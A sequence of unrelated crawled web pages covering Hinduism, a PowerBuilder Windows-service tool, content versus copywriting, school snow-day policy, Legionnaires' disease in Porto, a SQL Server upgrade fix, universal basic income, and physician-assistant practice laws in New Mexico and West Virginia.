rituals to seek a direct access to superconsciousness. The three central tenets of Hinduism on the transcendent level are Dharma, Karma, and Moksha. Dharma is the basic moral force that holds the universe (composed of all sentient beings) together. By contrast, Karma is individualized. A man or woman's present status in life is a consequence of good or evil deeds in past lives. Likewise, present conduct holds the key to future existence. Fatalism and free will are two faces of the same synergy. Individuals can cross over metaphysical and social obstacles through sustained effort. Hagiographic accounts of India reveal the success of esteemed men and women who overcame their limitations through determination. Moksha is the transcendence of karmic bondage: the cessation of births and deaths. Even in the present life, one can attain liberation from worldly ensnarements and attain mental peace. The Bhagavad Gita (Divine Song) shows the path through which an individual finds detachment in the midst of occupational commitments. For the numerous householders who constitute the bulk of Hindu society, there are three social pursuits that are normatively defined. These are dharma (ritual and legal obligations), artha (attainment of prosperous life), and kama (satisfaction of sexual and procreative needs). These tenets show that Hinduism did not lack commitment to this world. The virtuosi have mainly pursued the transcendent ends; the laity have usually operated on a normative level. Popular Hinduism has centered on fasts and feasts, pilgrimage to temple towns, and so on. It provides scope for the religiously minded people to reach emotional catharsis through collective participation in rituals. Brahmins are, in ritual terms, at the top of the caste system. They are the literati safeguarding the sacred traditions of Hindus. They are mostly householders who are often aligned with sectarian or monastic centers. Brahmins are not monolithic; only a few of them are priests catering to people's sacramental needs. Many of them have been engaged in secular pursuits both in the past and at present. Although not landed or wealthy, they have retained a high ritual position. Their social exclusiveness and inflexibility have often made them targets of attack by Hindu reformers; however, a number of Brahmin individuals were absorbed into the heterodox sects because of their intellectual acumen. This was a paradoxical element in the development of Hinduism. Although there is no central church in Hinduism, sects have arisen within it from time to time to reform, innovate, and provide a more concise interpretation of spirituality. Hindu orthodoxy has often been challenged by heterodox sects, but Hinduism and its sects have always retained links with each other. The main inspiration to innovate has come from orthogenetic sources. Buddhism and Jainism were the early sects that devalued priestly liturgy; they protested against the ascriptive constraints (caste and status) and promoted a new ethicospiritual order. Buddhism made compassion to all living entities (man, animal, and plant) religiously significant; Jainism forbade killing of animals and birds for food. Both these groups made monasticism a more important factor than worship at the temple. Subsequently, the bhakti (devotional) sects emerged in south India during the sixth to eleventh centuries C.E. and in north India during the fourteenth to seventeenth centuries. These sects propagated a liberalism that freed people from ritual and social inhibitions and made them all equal before god. These bhakti sects mediated between the Marga (Sanskrit tradition) and the Desi (folk tradition) and reached out to the common people. Through their literary compositions, they greatly enriched the regional languages, such as Punjabi, Hindi, Bengali, Marathi, Tamil, Kannada, and so on. In the wake of colonial rule, new reformist trends emerged in Indian society. Hindu reformism had three well-known figures: Ram Mohan Roy, Dayananda Saraswati, and Vivekananda. Drawing upon the Vedantic tradition, they staunchly supported a cultural nationalism . The political awakening came in the early part of the twentieth century. Aurobindo, Tilak, and Gandhi were among the notables who launched the struggle for freedom from foreign rule. All of them made attempts to redefine Hinduism and make it more adaptable to modern times. In the meantime, the colonial policies of the British rulers engendered a feeling of separateness between Hindus and non-Hindus (especially Muslims). Amity had persisted between the two communities up to the colonial period, in spite of the political rivalries of Hindu and Muslim rulers. The Partition of India (1948) estranged the two groups on a large scale; it was the culmination of a political process that had begun some decades earlier. A careful study of Hinduism will reveal that the phrase Hindu communalism is an oxymoron: Hinduism has been tolerant, while communalism has been overzealous. Despite its traumatic impact on the plural society of India at present, it will weaken or fade out in the near future. Social Scientific Study of Hinduism The pioneer sociologist to study India on a comparative basis was Max Weber, who inquired into Hinduism and its sects; he drew upon the Indological literature that was available in Germany. More recent studies have taken a social anthropological approach. Bose (1975) has described the religious ties that exist between India's tribes and castes; an index of these ties is the participation of Hindu men and women across the country in celebrations at places of pilgrimage. Ghurye (1969) has shown that the major gods and goddesses of Hinduism are symbols of ethnic integration; the complex process of assimilating minor, local deities into the all-India pantheon of major deitiesnamely, Shiva, Vishnu, and Shaktihas lent unity to an extremely heterogeneous society. Srinivas (1952) has depicted the Hinduization of an indigenous group in a hill area of south India; this study has enabled him to develop the concept of "Sanskritization" for the analysis of wider aspects of Hindu society. Dumont (1970) has traced the worship of a folk deity of south India to the interactions between Aryan and Dravidian liturgical forms. Marriott (1955) has studied the encounter between the Great Tradition (derived from Sanskrit scriptures) and the Little Tradition (derived from folk beliefs and practices) in a village in north India. Singer (1972) has highlighted the adaptability of the Great Tradition to modern times in spite of its religiosity and hieratic structure. Beyond these social anthropological works, economic and psychological aspects have been considered. Mishra (1962) has examined economic growth in Hindu society with an emphasis on diachronic aspects. Kakar (1982) has referred to the roles of shamans and mystics in the treatment of certain mental illnesses that have afflicted Hindus. Pocock (1973) has analyzed the social impact of a Vaishnavite sect on the beliefs and rituals of a village in western India. Ishwaran (1983) has explored the rise of a Shaivite sect in south India that, inter alia, contributed to an indigenous model of modernization. Babb (in Madan 1991) and Haraldsson (1987) have analyzed different aspects of the cult surrounding the south Indian mystic Sathya Sai Baba. Vidyarthi (1961) has studied the ritual interdependence between the Brahmin priests of a sacred center in north India and the pilgrims of various castes. Oommen (1986, 1994) has referred to the dominant cultural mainstream (derived from Hinduism and caste hierarchy) that has tended to treat religious minorities as outsiders. Venugopal (1990) has shown that the reformist sects in India have contributed to a sociopolitical ordering of Indian society. In addition to these, there are also studies of temple dancers, ritual specialists, and ascetic groups who belong to Hindu society. C. N. Venugopal N. K. Bose, The Structure of Hindu Society (Delhi: Orient Longman, 1975) L. Dumont, Religion, Politics and History in India (Paris: Mouton, 1970) G. S. Ghurye, Caste and Race in India (Bombay: Popular, 1969) E. Haraldsson, Modern Miracles (New York: Fawcett, 1987) K. Ishwaran, Religion and Society Among the Lingayats of South India (New Delhi: Vikas, 1983) S. Kakar, Shamans, Mystics and Doctors (New York: Knopf, 1982) T. N. Madan (ed.), Religion in India (New York: Oxford University Press, 1991) M. Marriott (ed.), Village India (Chicago: University of Chicago Press, 1955) V. Mishra, Hinduism and Economic Growth (Bombay: Oxford University Press, 1962) T. K. Oommen, "Insiders and Outsiders," International Journal of Sociology 1(1986):53-74 T. K. Oommen, "Religious Nationalism and Democratic Polity," Sociology of Religion 55(1994):455-479 D. F. Pocock, Mind, Body and Wealth (Oxford: Blackwell, 1973) L. Renou, Hinduism (Englewood Cliffs, N.J.: Prentice Hall, 1961) M. Singer, When a Great Tradition Modernizes (New York: Praeger, 1972) M. N. Srinivas, Religion and Society Among the Coorgs of South India (Oxford: Clarendon, 1952) C. N. Venugopal, "Reformist Sects and the Sociology of Religion in India," Sociological Analysis 51(1990):S77-S88 L. P. Vidyarthi, The Sacred Complex of Hindu Gaya (Bombay: Asia, 1961) M. Weber, The Religion of India (Glencoe, Ill.: Free Press, 1958). |return to Encyclopedia Table of Contents|
<urn:uuid:2f7b0074-cfb7-4a91-8dbe-d6dbd32403aa>
CC-MAIN-2022-33
http://hirr.hartsem.edu/ency/Hinduism.htm
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571222.74/warc/CC-MAIN-20220810222056-20220811012056-00677.warc.gz
en
0.930912
2,736
3.71875
4
If you have ever wanted to create a Windows Service program using PowerBuilder then you have come to the right place. PBNIServ will allow you to easily create a service with PowerBuilder 9 or greater. No complex API calls to worry about, it just works right! What is a Windows Service? A Windows Service is a program that has no user interface and is started automatically when Windows starts. The program continues running until Windows is shut down. There does not need to be anyone logged on to Windows for the program to run. A service program is ideal for programs that run on a server machine without user intervention. This would include programs that run reports on a schedule or periodically processing files. What is PBNIServ? PBNIServ is a generic Windows Service program written in C. It uses the PBNI (PowerBuilder Native Interface) feature introduced in PowerBuilder 9 to execute functions within a non-visual userobject. A base service object is included that you inherit objects from. The C program calls the predefined functions and your PowerBuilder code is executed. When your service is installed, the library file and userobject name are given and are stored in the registry. The C program reads these values from the registry and generically loads the userobject and executes the appropriate functions. This design allows you to create a true Windows Service program entirely in PowerBuilder! Also included is a Service Control application. It has functions to start, stop, pause and resume services. You can also use it to send user defined control codes to the service. Why do I need PBNIServ to create a service? A true Windows Service program uses callbacks. A callback is when you pass a function in your program as an argument to a Windows API function. The API function then makes calls to your function. PowerBuilder does not support callback functions. There are 2 callback functions involved in writing a service program, StartServiceCtrlDispatcher and RegisterServiceCtrlHandlerEx. How do I create a service with PBNIServ? Creating a service with PBNIServ is very easy. There are no Windows API functions to call, just 100% pure PowerBuilder code. See how easy it is by downloading the free demo and giving it a try yourself. Operating System compatibility PBNIServ was originally developed on Windows XP. It has been tested on Windows 2000, Windows XP, Windows Vista 32bit, Windows 7 64bit, Windows 8, and Windows 10. I have not tried it on Windows 2003 Server or higher. I am not aware of anything that would prevent it from working. Windows 2000 does not support the of_sessionchg function.
<urn:uuid:0dc16bea-2c58-41a4-8e32-104a8cb68c66>
CC-MAIN-2017-04
http://www.topwizprogramming.com/pbniserv.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00226-ip-10-171-10-70.ec2.internal.warc.gz
en
0.897517
549
2.140625
2
The only thing that is common between content and copywriting is writing itself but the thing that differentiates them from each other is the form of writing. Copywriting is said to be the oldest form of writing content and it is believed that copywriting was first introduced in 1477 in the Babylonian times. On the other hand, content writing came into existence in the year 1990 at the time of the evolution of online activities. To get more info about the difference between Content writing and Copywriting keep reading this blog. - Learn about content and copywriting - Understand the difference between content writing and copywriting - Know about the career opportunities that you can get as a content and copywriter. What is Content Writing Content writing is a long-form of writing content. It is done to start a conversation with the readers to inform them about the particular subject and at the same time, Content writing is also used to educate the readers as well. Content writing involves writing Blog posts, Articles, and Text posts for all social media forums. The main purpose of content writing is to Educate, Engage and Inform readers. What is Copywriting? It’s the process of writing persuasive words that attract readers to take immediate action. Copywriting is one of the most effective ways of writing content. A copywriter tries to convey his message directly to his audience in fewer words. Copywriting is used to write advertising and promotional content which is sales-oriented. It is also used for marketing purposes and running campaigns. Copywriting includes Advertisements, Ad copies, promotional content for Email, Sales letter, and Scripts. Difference between Content Writing and Copywriting |Key differences||Content writing|| Copywriting| |Definition||Content writing means writing the content to give information to their readers.||Copywriting is a method through which a writer tries to prompt readers to take a specific action.| |Form of writing||Content writing is a long-form of writing content||Copywriting is a short form of writing the content in lesser words.| |Purpose||The sole purpose of content writing is to inform, educate and engage readers.||The Purpose of Copywriting is to persuade the reader’s mind.| |Goal||The goal of content writing is to build loyal customers for a longer period by providing quality content||The main goal of copywriting is to generate sales and boost advertisement| |Way of communication||In content writing a writer tries to communicate with his readers Indirectly||In copywriting a writer conveys his message directly to the audience in short sentences or words| Skills Required for content writing and copywriting - Excellent writing skills:- If you want to become a good content and copywriter you need to have impeccable writing skills because everything is dependent on the content that you are writing. If your content is not good enough then you will not be able to engage readers and sell the copy of your content. - Creative Thinking:- To become a pro in the game of content you have to think out of the box. Your creativity is something that will define the fate of your content so you have to be precisely creative while doing content and copywriting. - Research skills:- Research is the most important part of writing any piece of content because the way you do your research will determine the value of your content. Doing research can help you get in-depth knowledge about the subject that you are working on so that you can spit appropriate facts while writing. - Strong Vocabulary:- Irrespective of the fact whether you are content or a copywriter you need to have strong vocabulary skills to write good and engaging content until and unless you have strong command over your vocabulary you will not be able to deliver quality content. Careers in content writing and copywriting Every industry requires a writer in some capacity and ever since we have experienced the increase in online business the demand for content and copywriters are at its peak. To advertise and promote their product and services business requires quality content to make an impact in the reader’s mind; that’s where the role of a writer comes into play. Let’s throw some light on the job opportunities that you can get as a content and copywriter. - Research writer - Academic writer - Technical writer - social media manager - content marketing manager - Content manager - creative writer - Content editor and proofreader Do Not Miss: Tips On How To Start Your Freelance Writing Career Is a content writer a copywriter? Well! The answer is a “Big No “ both the terms are way different from each other with some sheer similarities but it does not mean that a content writer is a copywriter or vice versa. A content writer tries to build a loyal customer base for a longer period by writing a long form of content to communicate with its readers indirectly. But on the other hand, a copywriter is the one who sells your target audience to your brand. Technically both are different terms often used as similar, don’t know why even after having a huge difference. It’s high time we understand the difference between them and hence not get confused between both the terms. The difference between content and copywriting is the style and form of writing both have their way of writing the content. One uses an indirect approach to communicate with its readers. While the other uses a direct way to communicate. I hope this blog will help you get in-depth information about content and copywriting. Frequently Asked Questions (FAQs) Is copywriting the same as content writing? No they both are different from each other the form of writing is the major difference between them. What pays more copywriting or content writing? The answer is a copywriter. The average salary of a copywriter is more than that of a content writer. What are the types of copywriting? There are three types of copywriting are there 1.Direct response copywriting
<urn:uuid:e8bb8418-f0dc-4a02-93f8-b851055e55d4>
CC-MAIN-2022-33
https://blog.verzeo.com/difference-between-content-writing-and-copywriting/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573744.90/warc/CC-MAIN-20220819161440-20220819191440-00473.warc.gz
en
0.948474
1,266
2.796875
3
We closely monitor the weather forecast for snow and extremely cold temperatures throughout the winter months. The website I trust most for weather information is www.weather.gov. When the decision to close school is made, the information will appear first on my Twitter feed. You can follow me at @DrJoeClark. In addition, parents will receive a phone call, and the information will be posted on our website and all major local news stations. Whenever possible, the decision to close school will be made the previous evening. However, closings may be announced as late as 6 a.m. depending on a variety of factors. There is not a specific temperature policy for the schools, but we use the National Weather Service Windchill Chart as a guide, based on their methodology found here. In addition, we closely monitor road conditions and the ability of our buses to run on time. We will most likely have school if the temperatures remain in the lightest blue color on the chart and the buses are running on time. However, it is not uncommon for us to close when the windchill is -15 or colder for a sustained period of time. We make decisions that are in the best interest of our students with safety as our number one priority. Parents know their children best. If parents are concerned for their children's safety getting to and from school or activities, we respect their right to keep them home. When the Nordonia Schools are closed for weather, all evening activities in the elementary and middle school buildings are cancelled. High school activities may take place depending on the weather throughout the day. In addition, pre-school and Champions are cancelled and transportation to CVCC is not provided on "snow days." Community groups scheduled to use school facilities on "snow days" (e.g., youth athletic leagues, Scouts, etc.) will have their events cancelled. Please know that while I appreciate good-natured tweets from students begging me for a day off, they play absolutely no factor in my decision making process. Also, Twitter posts from local weathermen making predictions about the chances of having a snow day are made to increase their social media traffic and have no credibility.
<urn:uuid:fa52a1ae-edd1-4cbf-a087-fafa5cf34d05>
CC-MAIN-2017-04
http://www.nordoniaschools.org/protected/ArticleView.aspx?iid=6Y3A0YB&dasi=3YBI
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00043-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967428
453
1.640625
2
16 Indiana Journal of Global Legal Studies 565 (2009) The surge of interest among international lawyers in "constitutionalism" represents one of several efforts to reconceptualize internationa governance; others include the research projects on global administrative law and legalization. The article applies the constitutionalist lens to international environmental law-one of the few fields of international law to which constitutionalist modes of analysis have not yet been applied. Given the protean quality oft he terms "constitution"and "constitutionalism,"t he article begins by unpacking these concepts. By disaggregating these concepts into a number of separate variables, which have more determinate, unambiguous meanings, we can answer the question, "Is there an international environmental constitution?", in a more nuanced way-not in an all or nothing fashion, but by considering the extent to which international environmental law has constitutional dimensions. The article concludes that, although individual treaty regimes have constitutional features, international environmental law as a whole lacks the hallmarks of a constitutional order. Global Constitutionalism – Process and Substance, Symposium. Kandersteg, Switzerland, January 17-20, 2008 "Is There an International Environmental Constitution?," Indiana Journal of Global Legal Studies: 2, Article 8. Available at: http://www.repository.law.indiana.edu/ijgls/vol16/iss2/8
<urn:uuid:3f833e97-31fe-423c-b8fd-7a454be8f79b>
CC-MAIN-2016-44
http://www.repository.law.indiana.edu/ijgls/vol16/iss2/8/
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719547.73/warc/CC-MAIN-20161020183839-00395-ip-10-171-6-4.ec2.internal.warc.gz
en
0.877596
284
2
2
Since the last week of July, Executive North Regional Health officials have reported up to 16 Legionnaires’ disease cases in the second largest city of Porto, or Oporto, according to a health ministry press release (computer translated). The press release states 12 cases confirmed; however, local media put the case count at 16. According to the official health ministry information, 10 of the cases occurred in residents of Grand Harbour, while two cases were considered travel-associated. At least two patients are still hospitalized for their illness and they are responding favorably to treatment, health officials note. Legionnaires’ disease is caused by the bacteria Legionella. Additional symptoms include: headache, fatigue, loss of appetite, confusion and diarrhea. Symptoms usually appear two to 10 days after significant exposure to Legionella bacteria. Most cases of Legionnaires’ disease can be traced to plumbing systems where conditions are favorable for Legionella growth, such as whirlpool spas, hot tubs, humidifiers, hot water tanks, cooling towers, and evaporative condensers of large air-conditioning systems. Legionnaires’ disease cannot be spread from person to person. Groups at high risk for Legionnaire’s disease include people who are middle-aged or older – especially cigarette smokers – people with chronic lung disease or weakened immune systems and people who take medicines that weaken their immune systems (immunosuppressive drugs). - Hoover scholar questions CDC’s Legionnaires’ disease policy - Portugal Legionnaires’ disease outbreak tops 300 cases; said to be ‘evolving rapidly’ - Portugal: 13 people sickened with brucellosis from homemade goat cheese
<urn:uuid:aaccf4cd-dfd4-46b7-b6be-236c671be675>
CC-MAIN-2016-44
http://outbreaknewstoday.com/legionnaires-outbreak-in-north-portugal-city-of-porto-37057/
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988720962.53/warc/CC-MAIN-20161020183840-00386-ip-10-171-6-4.ec2.internal.warc.gz
en
0.912841
346
2.75
3
This lesson requires careful planning to ensure safety and correct procedure. Students use a light table to trace shapes from the film positive before cutting paper stencils. Suggested Time Frame: 1 class period - Student will trace their film positives using a light table - Students will cut three paper stencils to create a multi-layered print
<urn:uuid:b9eb5c59-100e-444c-9779-e9e59e8cea89>
CC-MAIN-2016-44
http://www.warhol.org/education/resourceslessons/Lesson-5--Silkscreen-Printing/
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719677.59/warc/CC-MAIN-20161020183839-00561-ip-10-171-6-4.ec2.internal.warc.gz
en
0.856471
71
3.25
3
when relevant content is added and updated. Something which has come up when upgrading Microsoft Operations Manager 2007 to 2012 is that there is an extra step which isn’t really documented in the Ops Manager upgrade guide. You see when upgrading from Ops Manager 2007 to 2012 you also need to upgrade the SQL Server to SQL Server 2008 R2 as that is required by Ops Manager 2012. As the install of Ops Manager 2007 to probably from 2007 or 2008 it’s probably running on SQL Server 2005 today so that requires that the database be upgraded before the Ops Manager software can be upgraded as one of the prerequisites for running Ops Manager 2012 is that you are running SQL Server 2008 R2. The problem comes from the fact that when you upgrade SQL Server there is a setting called the compatibility mode which doesn’t get changed by default. The reason for this is that you can continue to use older T-SQL syntax while still upgrading the database engine to the newest version. When the compatibility mode is left at the older level (in this case SQL Server 2005 compatibility mode) newer T-SQL features aren’t available. In the case of Ops Manager going from SQL Server 2005 to SQL Server 2008 R2 the feature in question that is needed is the MERGE statement which wasn’t available in SQL Server 2005. The annoying thing here is that Microsoft doesn’t test for the compatibility mode when going through the Ops Manager upgrade process so this doesn’t get flagged. This means that you’ll get through the service upgrade and when you get into the second migrating phase, doing the management group updates) the System Center Management Configuration Service will throw Error number 29112 and the entire Ops Manager system will stop working. Why it is throwing this error message is because the Management Configuration Service is attempting to create stored procedures which use the MERGE statement which the SQL Server 2005 compatibility mode doesn’t understand. Thankfully fixing this is very easy. Log into the SQL Server database engine which you are using to host the Ops Manager databases. In the object explorer within SQL Server Management Studio right click on the OperationsManager and OperationsManagerDW databases and select properties (do one database at a time). On the options tab change the compatibility mode from SQL Server 2005 to SQL Server 2008. Then click OK as shown below (click to enlarge). If you prefer this change can also be made with a couple of simple ALTER DATABASE statements as shown below. ALTER DATABASE [OperationsManager] SET COMPATIBILITY_LEVEL = 100 ALTER DATABASE [OperationsManagerDW] SET COMPATIBILITY_LEVEL = 100 Either way once the change is made there is no restart of the database engine required. Just fire up the System Center Management Configuration Service and let it do it’s thing and it’ll complete that step of the upgrade process. I hope this helps,
<urn:uuid:44337b36-dd0a-4de7-8136-d4dd98044550>
CC-MAIN-2017-04
http://itknowledgeexchange.techtarget.com/sql-server/upgrading-ms-ops-manager-sql-server/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280410.21/warc/CC-MAIN-20170116095120-00448-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896806
600
1.53125
2
ALL >> Computers >> View Article Softwareonlineusa.com The Usa's Online Laptop Computer, Mac And Pc Software Store Total Articles: 196 When you begin searching for a laptop, you could locate a lot of info. A few of it helpful, and a few of it dated and meaningless. It can be difficult to identify just what information is most effectively. Fortunate you located this specific post. You can utilize it to make excellent selections by applying the adhering to suggestions. Just before beginning laptop purchasing, obtain a concept of the type of employment that you anticipate to acquire out of it. You may discover that you truly do not need the super-expensive top of the line model for the work you actually should do. This could conserve you a great deal of cash. If you're acquiring a laptop computer from someone online, you shouldn't pay added to have actually programs installed that do things like word processing. You will most likely be asked for the existing list price for the software application. Check out a rebate software supplier to save money. You could conserve from 20 to 30 percent many of the time, yet often you could save even more compared to that. Before buying that netbook, truly consider whether you have actually acquired the processing energy that you need in the machine. Netbooks are remarkable on battery yet usually poor employees in terms of energy. If you are making use of the equipment for e-mails and light word processing, you'll be ok. However if you are looking for even more, then an additional choice may be better. Consider online reviews when you wish to buy a laptop computer online. While evaluations need to be taken with a restriction, it could assist you see if the design you desire is worth purchasing. Several times, these evaluations will certainly include essential details on just how fantastic or bad a design is and just what their experience was. This could save you a bunch of stress and money if you know what to buy or stay clear of. Discover out whether a brand-new design of the laptop computer you are taking into consideration is concerning to emerge. Often times, the latest model of a laptop computer is simply the most expensive. Assume about obtaining the model that merely went out of period; you'll save money and still have a laptop computer that is very brand-new. The size of your laptop computer depends on just how much you need to take a trip with it. If you travel often, your finest alternative is a small, lightweight computer system. The screen and key-board are little on these computers, however it makes traveling much less complicated. If you are primarily intending to use your laptop in the home, you could go bigger. SoftwareOnlineUSA.com Buy discount buy software application for mac usa or COMPUTER. Also computer software program like operating system software applications and application software program OEM, software program licensing, Microsoft, Adobe, Symantec, and much more. Visit SoftwareOnlineUSA.com today Computers Articles1. Gmail Account Recovery Steps By Reset Gmail Password Experts (866)324-3o42 Author: sofia smith 2. Gmail Customer Care Number 1-844-209-3224us Gmail Customer Service Author: Gmail support number for resolving Gmail issues 3. Tор Four Tірѕ Fоr Choosing A Web Developer Fоr Your Web Site 4. Four Straight Forward Steps For A Web Design 5. How To Choose Thе Rіght Web Developer Fоr уоur Wеb ѕіtе 6. How To Be A Creative Web Developer 7. The Computer Repair Service Milwaukee Is A One Stop Shop For All Computer Repairs And Data Recovery 8. Contact Data Recovery Milwaukee Experts To Restore Data From Failed Hard Disc Drives 9. Contact Expert Hyip Custom Design Professionals To Enhance Your Business Presence Online 10. How To Resolve Yahoo Mail Sign In Page Problems Author: mark belly 11. 5 Tips For Choosing Your Salesforce Consulting Partner Author: Allie Laine 12. The Best Site For Your Revelation Online Gold 13. The Best Gaming Store At Your Service 14. The Best Gold Buys For Albion 15. Find The Best Sales For Mmorpg Gold
<urn:uuid:3c1e7855-68f2-4378-b4e7-a1f30237122e>
CC-MAIN-2017-04
http://www.123articleonline.com/articles/802908/softwareonlineusacom-the-usas-online-laptop-computer-mac-and-pc-software-store
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00551-ip-10-171-10-70.ec2.internal.warc.gz
en
0.885942
883
1.539063
2
Words used can be misleading at times. Does it mean that fault is not assigned according to no-fault auto insurance state laws? If everyone settles their own damages there is no need to look who is at fault, isn’t it? This is a question that may be silly but not difficult to understand where it comes from. First of all no-fault has nothing to do with who is at fault. No fault state laws does not prevent insurance companies looking into whose fault is an accident. They just require the policyholders to settle small injury losses through their own insurers rather than chasing after the third parties and opening up many small legal cases. Auto insurance companies would still want to know if the accident was the fault of their policyholder or the third party. If they determine that their policyholder was at fault it is highly likely that they would increase the premium a bit more than a claim that wasn’t the policyholders fault. So to answer this question; you may not pay the injuries of third parties but you may still go down as the at fault driver in the accident (at least, as far as your auto insurer concerned). Also, most no-fault states set a limit as to up to how much damages you should claim from your own insurer. If the damages are higher than certain threshold or in special circumstances where the negligence of a driver caused serious suffering the third parties are allowed to sue the at fault driver. So, police and auto insurers would try to find who is at fault in an accident of certain size for several reasons. 1. Police would want to decide if there is a need for charging the driver with a traffic violation and if there is a need to charge extra premium in case of insurers. 2. They would need to do their jobs properly just in case this goes to court or some claims come back to the insurers. Clearly, the driver who is responsible for the accident needs to be identified in any case. Otherwise, people cannot be punished for their irresponsible driving practices. In other words, bad drivers would be allowed to walk away with no consequences or little financial or legal punishment. This cannot be allowed as it would lead to more and more insurance losses. Modern automobile insurance pricing is based on penalizing risky drivers and rewarding the good ones.
<urn:uuid:54d69cde-4397-4f6d-875e-794ed84318db>
CC-MAIN-2017-04
http://cheapautoinsurance.net/definition-of-fault-in-no-fault-auto-insurance-states/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00169-ip-10-171-10-70.ec2.internal.warc.gz
en
0.976558
466
2.015625
2
The Dirty Facts on Affordable Home Heating and Air Conditioning By specifying the energy output of a furnace through the BTU, an individual will have the ability to gauge the quantity of heating that the furnace can generate. There are several modern gas water heaters where you are able to control the heating rate and the amount of heating. In the event, a furnace doesn’t demonstrate the listing for the output BTU, utilizing the parameters mentioned previously, an individual could figure out the output BTU easily. The var-cap furnace stipulates the most effective heating and cooling. It ought to be mentioned however that floor furnaces will merely become blocked if they’re not correctly cared for and maintained so this circumstance isn’t guaranteed to happen whether that choice is chosen. An air conditioner, in the same way as any other equipment, could malfunction at any hour of the day and this means that you are going to have to experience a challenging ordeal in order to win against the heat. Whether your air conditioner has malfunctioned in the center of the evening or on a busy afternoon, all you have to do is make a call for those experts and they’ll deal with the rest. Nevertheless, there still remain occasions once the air conditioner doesn’t function because of a technical glitch or malfunctions because of power failure. An air conditioner is composed of many parts which require repairs in addition to replacement from time to time, and this may only be carried out by experts in the specialty. It requires regular maintenance and servicing in order to function effectively. The Honest to Goodness Truth on Affordable Home Heating and Air Conditioning When it’s a toss-up between repairs and replacing, they need to supply you with the advantages and disadvantages of doing each. Heating and ac repair and installation are the most often acquired services for home appliance restoration. Together with a wide selection of colours and patterns, maintenance is easy while tile prices are getting increasingly more affordable. A normal maintenance and servicing of the air conditioner will raise the lifespan of the unit and also boost the operation of the exact same. Moreover, AC repairs can be a tiny check and have someone who’s trusted by a big amount of people is what makes a tad easy. AC repair and maintenance can get troublesome if not handled by the ideal personnel. Necessary repairs and maintenance are finished by means of a plumber. The service can be found at a very affordable rate and you are going to have a remedy to your troubles easily. The services are offered at an inexpensive rate and make sure customer satisfaction. In times such as these, AC repair service can be found available. The AC repair service is fast, handy and available at an inexpensive speed. With all these options of heating and air-conditioning assistance, an individual might get confused about which to choose. The service can be found at an inexpensive rate and you are going to have a fast remedy to your troubles effortlessly. It is crucial to make sure service of air-duct cleaning isn’t just an extra service offered by the organization. Their services are hassle free together with affordable. General Service and upkeep of the air conditioner will enhance the operation of the unit and also boost the lifespan of the exact same.
<urn:uuid:b0781961-7fe1-464c-a497-f4b9600b5183>
CC-MAIN-2022-33
http://affordableairconditioningandheatingrepair.com/the-one-thing-to-do-for-affordable-home-heating-and-air-conditioning/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570767.11/warc/CC-MAIN-20220808061828-20220808091828-00469.warc.gz
en
0.950423
666
1.617188
2
Raising The Floor: How a Universal Basic Income Can Renew Our Economy and Rebuild the American Dream Listen to story: Download: mp3 (Duration: 20:41 — 18.9MB) FEATURING ANDY STERN – What would you with your life if you didn’t have to worry about earning a salary and your most basic needs were met? That is a question that only the independently wealthy in our country have the luxury of contemplating. You might become an artist, a writer, a tech innovator, a chef – the possibilities are endless. But of course you can’t imagine such things. You and I have to worry about where we get our health insurance, how we might juggle two jobs to make ends meet, how we are going to pay for child care or rent. A vast majority of Americans are stuck working in an economy that is not working for them – one where jobs are part time, pay is dismal, the so-called “gig-economy” is ever dominant, and unionization is stagnant. Andy Stern, former president of one of the nation’s strongest unions, SEIU, has offered the idea of a universal basic income (UBI) as a solution to our rapidly transforming economy. Citing the increasing replacement of human workers with an automated workforce, Stern, in a new book, has made a strong case for why we need a universal basic income now more than ever. Andy Stern, former president of the Service Employees International Union (SEIU), a 2.2 million strong organization. He served on the Simpson-Bowles commission and is currently the Ronald O. Perelman Senior Fellow at Columbia University’s Richard Paul Richman Center for Business, Law, and Public Policy. He is the author of Raising The Floor: How a Universal Basic Income Can Renew Our Economy and Rebuild the American Dream.
<urn:uuid:1d9113e8-da86-48ed-a93f-4ed22f3c51fa>
CC-MAIN-2022-33
https://risingupwithsonali.com/raising-the-floor-how-a-universal-basic-income-can-renew-our-economy-and-rebuild-the-american-dream/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570871.10/warc/CC-MAIN-20220808183040-20220808213040-00264.warc.gz
en
0.949269
393
1.8125
2
Earlier this year, New Mexico amended its Medical Practice Act to allow collaborative practice relationships between physician assistants (PAs) and licensed physicians (HB 215). The changes to the law allow PAs who practice primary care to collaborate with a licensed physician but require PAs who practice specialty care to be supervised by a licensed physician. Collaboration is defined as the “process by which a licensed physician and a physician assistant jointly contribute to the health care and medical treatment of patients” and requires each of the parties to deliver only the services they are licensed and authorized to provide. A collaborating physician does not need to be physically present when a PA is providing services. New Mexico also changed the certification requirements for PAs. In the past, a PA had to be certified by the National Commission on Certification of Physician Assistants. Now the state medical board can designate additional certifying agencies. The West Virginia Legislature also addressed the issue of PA collaboration and passed a bill amending the state’s Physician Assistants Practice Act (SB 347). Unlike the change to New Mexico’s law, which makes a distinction between collaboration and supervision, the West Virginia bill essentially substitutes the term “supervision” with “collaboration” (i.e., the definition of collaboration is the same as supervision). While it did not create a difference between collaboration and supervision, the bill did make other key changes to PA practice. First, it provided that PAs are entitled to 100 percent of the allowable reimbursement rate given to physicians or advanced practice registered nurses by private and public insurance plans. Second, the bill gave PAs signatory authority for documents within their scope of practice including death certificates, do-not-resuscitate forms, handicap hunting certificates, and utility service maintenance forms. Finally, the bill removed a requirement for PAs to maintain certification from the National Commission on Certification of Physician Assistants. The removal of the PA certification requirement caused West Virginia’s governor to veto the 